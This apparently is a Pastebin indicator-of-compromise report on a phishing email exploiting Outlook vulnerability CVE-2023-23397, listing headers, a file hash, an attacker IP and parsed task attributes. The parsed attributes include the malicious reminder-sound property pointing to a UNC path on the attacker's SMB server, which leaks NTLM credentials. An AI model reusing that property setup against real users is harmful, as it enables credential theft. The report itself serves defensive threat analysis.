Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #MSOutlook #EoP #SMB #NTLM
- https://pastebin.com/FJDa0MA8
- FAQ:
- https://msrc.microsoft.com/blog/2023/03/microsoft-mitigates-outlook-elevation-of-privilege-vulnerability/
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
- https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2023-exchange-server-security-updates/ba-p/3764224
- https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/
- attack_vector
- --------------
- email attach lrmng.txt > CVE-2023-23397 exploit > Outlook Task > \\85.195.206.7\lrmng\ > NTLM negotiation request > exfil of NTLM credentials
- # # # # # # # #
- email_headers
- # # # # # # # #
- Return-Path: <officedip@alsaeedi.com>
- Received: from semf03.mfg.siteprotect.com (semf03.mfg.siteprotect.com [64.26.60.166])
- Received: from smtpauth02.mfg.siteprotect.com ([64.26.60.151])
- Received: from [127.0.0.1] (unknown [85.195.206.7])
- Content-Type: application/ms-tnef; name=lrmng.txt
- Content-Transfer-Encoding: base64
- Content-Disposition: attachment; filename=lrmng.txt
- From: officedip@alsaeedi.com
- Subject: Alarm!
- Message-ID: <37a46b6c-fe82-4e9f-a6c2-29a2d49fe99a@alsaeedi.com>
- Date: Thu, 16 Mar 2023 09:50:29 +0000
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 562e40daf01ca6a8f397fed437abbd21bd33ffb8eedda2db3f2d6768b58b0444
- File name lrmng.txt [CVE-2023-23397 exploit]
- File size 6.94 KB (7108 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR email attach
- C2 85.195.206.7:445
- netwrk
- --------------
- 85.195.206.7 445 SMB Negotiate Protocol Request
- comp
- --------------
- System 85-195-206-7.init7.net 445 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office*\OUTLOOK.EXE
- persist
- --------------
- n/a
- drop
- --------------
- n/a
- # # # # # # # #
- additional info
- # # # # # # # #
- TNEF parsed
- --------------
- "attributes": {
- "Date Modified": "2022-06-07 07:56:42",
- "Date Received": "2023-02-07 09:54:49",
- "Date Sent": "2023-02-07 09:54:49",
- "From": [
- "Joe.Smith@cert.au",
- "EX",
- "/o=BLIND/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=71ecf18295c14e82bcf212b9c8722a0e-Joe.Smith@cert.au"
- ],
- "Message Class": "IPM.Task",
- "Message ID": "14DBDC85E2926A4291B27D5C13103DBE",
- "Message Status": 33,
- "Priority": 1,
- "Subject": "ALARM!"
- },
- "extended_attributes": {
- "0x8103": false,
- "0x8112": 2,
- "0x8113": 1,
- "0x811c": false,
- "0x8123": -1000,
- "0x8124": false,
- "0x8127": "",
- "0x812a": 0,
- "0x812c": false,
- "0x851e": true,
- "0x851f": "\\\\85.195.206.7\\lrmng",
- "0x8580": "Joe.Smith@cert.au",
- "0x8581": "00000002\u0001/o=CERT/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=71ecf18295c14e82bcf212b9c8722a0e-Joe.Smith@cert.au",
- "0x85eb": 1033,
- "InTransitMessageCorrelator": "3\ufffd\ufffd\ufffd(u$K\ufffdus>\ufffdw(\ufffd",
- "MAPI_ACCESS": 7,
- "MAPI_ACCESS_LEVEL": 1,
- "MAPI_AGING_DONT_AGE_ME": false,
- "MAPI_ALTERNATE_RECIPIENT_ALLOWED": true,
- "MAPI_ANNIVERSARY_EVENT_ENTRY_ID": "",
- "MAPI_AUTO_LOG": 0,
- "MAPI_BIRTHDAY_EVENT_ENTRY_ID": "Joe.Smith@cert.au",
- "MAPI_CHANGE_KEY": "\ufffd\u001e'M\u000e\ufffd\ufffdH\ufffd\ufffdK\ufffd1\ufffd-o\u0000\u0000\u0000\u0000\u001a\ufffd",
- "MAPI_CLIENT_SUBMIT_TIME": "2023-02-07 16:54:49.696000",
- "MAPI_CONTACT_USER_FIELD1": 0,
- "MAPI_CONVERSATION_INDEX": "\u0001\ufffd;\u0014\ufffdK>\ufffd\ufffd\ufffd\u0013x@\ufffd\ufffd\b\ufffd/\ufffd\ufffd\ufffd\ufffd",
- "MAPI_CONVERSATION_INDEX_TRACKING": true,
- "MAPI_CONVERSATION_TOPIC": "LGBTQ+",
- "MAPI_CREATION_TIME": "2023-02-07 16:53:29.210000",
- "MAPI_CURRENT_VERSION_NAME": "16.0",
- "MAPI_DELETE_AFTER_SUBMIT": false,
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/562e40daf01ca6a8f397fed437abbd21bd33ffb8eedda2db3f2d6768b58b0444/details
- VR
Add Comment
Please, Sign In to add comment
